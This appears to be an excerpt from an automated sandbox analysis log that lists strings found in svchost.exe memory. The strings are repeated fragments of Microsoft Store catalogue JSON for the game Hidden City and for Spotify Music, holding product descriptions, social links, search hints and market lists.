","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752761271.0000028A67B67000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","SkuTitle":"Hidden City: Hidden Object Adventure","Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH6J6VK","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH6J6VK","WuCategoryId":"e15668ee-9cc1-4bc2-ba76-e91eb1a11e95","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","SkuId":"0011"},"FulfillmentType":null,"FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"App"}],"Architectures":["x86"],"Capabilities":["internetClient"],"ExperienceIds":[],"MaxDownloadSizeInBytes":378738486,"PackageFormat":"AppxBundle","PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","MainPackageFamilyNameForDlc":null,"PackageFullName":"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6","PackageId":"07a1d8a1-8397-e482-20a2-bffb37866c1e-X86","PackageRank":30001,"PlatformDependencies":[{"MaxTested":2814750931222528,"MinVersion":2814750438195200,"PlatformName":"Windows.Universal"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_x86__ytsefhwckbdv6\"],\"content.isMain\":false,\"content.packageId\":\"828B5831.HiddenCityMysteryofShadows_1.37.3702.0_neutral_~_ytsefhwckbdv6\",\"content.productId\":\"94ad5279-e84a-4d40-b7cf-c6f16f916e6c\",\"content.targetPlatforms\":[{\"plat
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000003.752939030.0000028A6801D000.00000004.00000001.sdmp String found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000007.00000002.771405969.0000028A67B15000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000007.00000003.759491776.0000028A67B6E000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
